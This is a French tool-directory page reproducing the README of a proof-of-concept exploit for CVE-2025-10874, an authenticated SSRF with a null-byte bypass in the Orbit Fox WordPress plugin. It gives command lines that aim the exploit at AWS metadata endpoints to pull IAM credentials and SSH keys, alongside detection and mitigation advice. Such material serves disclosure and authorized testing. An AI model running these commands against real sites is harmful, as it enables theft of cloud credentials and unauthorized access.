Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — Démontre une SSRF avec contournement par injection d'octet nul pour CVE-2025-10874 | Kitploit
Outils/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

Démontre une SSRF avec contournement par injection d'octet nul pour CVE-2025-10874

Voir le dépôt
il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

alt text

CVE-2025-10874 - Preuve de concept SSRF Orbit Fox

Preuve de concept d'exploitation démontrant une vulnérabilité de type Server-Side Request Forgery (SSRF) dans le plugin WordPress Orbit Fox avec contournement par injection d'octet nul.

Article de blog détaillé : https://ryanmroth.com/articles/orbit-fox-ssrf

Détails de la vulnérabilité

DétailNotes
ID CVE :CVE-2025-10874
Plugin concerné :Orbit Fox par ThemeIsle
Type de vulnérabilité :Server-Side Request Forgery (SSRF) (CWE-918)
Score CVSS :5.5 (moyen)
Privilèges requis :Auteur+ (rôle Auteur WordPress ou supérieur
Version corrigée3.0.2+

Description

La fonctionnalité d'import MyStock du plugin Orbit Fox contient une vulnérabilité SSRF qui permet aux utilisateurs authentifiés disposant de privilèges Auteur+ d'effectuer des requêtes HTTP arbitraires depuis le serveur WordPress. La vulnérabilité existe dans l'action AJAX handle-request-mystock-import, qui ne valide ni ne nettoie correctement les paramètres d'URL.

L'exploit exploite un contournement par injection d'octet nul (%00.txt) pour contourner la validation d'URL, permettant l'accès aux services de métadonnées internes, aux API des fournisseurs cloud et à d'autres ressources réseau accessibles depuis le serveur.

Scénarios d'attaque courants

Extraction des métadonnées AWS EC2

  • Nom d'hôte de l'instance : http://169.254.169.254/latest/meta-data/hostname
  • Identifiants IAM : http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Clés publiques SSH : http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

Installation

Prérequis

  • Python 3.7+
  • Bibliothèque requests
  • Bibliothèque urllib3

Configuration

root@kitploit:~
# Cloner le dépôt
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# Installer les dépendances (avec uv)
uv sync

# Ou avec pip
pip install requests urllib3

Utilisation

Utilisation de base

root@kitploit:~
# Extraire le nom d'hôte de l'instance AWS (cible par défaut)
python orbit_fox_poc.py http://target.com -u author -p password123

# Spécifier une URL cible SSRF personnalisée
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

Exemples avancés

root@kitploit:~
# Extraire les identifiants du rôle IAM
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Extraire la clé publique SSH
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# Tester sans contournement par octet nul (échouera sur les versions corrigées)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# Activer la sortie de débogage pour le dépannage
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

Options de ligne de commande

root@kitploit:~
arguments positionnels :
  target                URL WordPress cible (ex. : http://example.com)

arguments requis :
  -u, --username        Nom d'utilisateur WordPress (rôle Auteur+ requis)
  -p, --password        Mot de passe WordPress

arguments optionnels :
  -h, --help            Afficher le message d'aide et quitter
  -s, --ssrf-url        URL à demander via SSRF
                        (défaut : http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         Désactiver le contournement par octet nul (tester le SSRF de base uniquement)
  --debug               Activer la sortie de débogage pour le dépannage

Fonctionnement

  1. Authentification : S'authentifie auprès de WordPress à l'aide des identifiants fournis
  2. Récupération du nonce : Extrait le nonce de sécurité du panneau d'administration WordPress
  3. Injection d'octet nul : Ajoute %00.txt à l'URL cible pour contourner la validation
  4. Exécution du SSRF : Envoie une requête conçue au point de terminaison AJAX handle-request-mystock-import
  5. Récupération du contenu : Récupère et affiche le contenu obtenu depuis la bibliothèque multimédia WordPress

Détection

Indicateurs de journal

  • Requêtes HTTP sortantes inhabituelles vers les services de métadonnées (169.254.169.254)
  • Requêtes vers admin-ajax.php avec l'action handle-request-mystock-import
  • Téléversements dans la bibliothèque multimédia WordPress depuis des URL internes/de métadonnées

Atténuation

  • Mettre à jour Orbit Fox vers la version 3.0.2 ou ultérieure
  • Mettre en œuvre un filtrage strict du trafic sortant sur le serveur WordPress
  • Surveiller et restreindre l'accès aux points de terminaison de métadonnées cloud
  • Examiner les rôles utilisateur et limiter les privilèges Auteur+

Divulgation responsable

Cette vulnérabilité a été divulguée de manière responsable à l'éditeur et a été corrigée dans la version 3.0.2 d'Orbit Fox. Cette preuve de concept est fournie pour :

  • La recherche et les tests de sécurité
  • L'évaluation de vulnérabilités de systèmes autorisés
  • Des fins éducatives

Avertissement légal

POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT

Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Les utilisateurs doivent :

  • Obtenir une autorisation écrite explicite avant de tester
  • L'utiliser uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous êtes autorisé à tester
  • Se conformer à toutes les lois et réglementations applicables

L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil.

Références

  • Vulnérabilité d'origine Alex Sanford – CVE-2023-2287
  • Détails CVE : CVE-2025-10874
  • Dépôt du plugin : Orbit Fox par ThemeIsle
  • Service de métadonnées AWS : Instance Metadata Service

Dernière mise à jour : 2025-10-06

Télécharger l’outil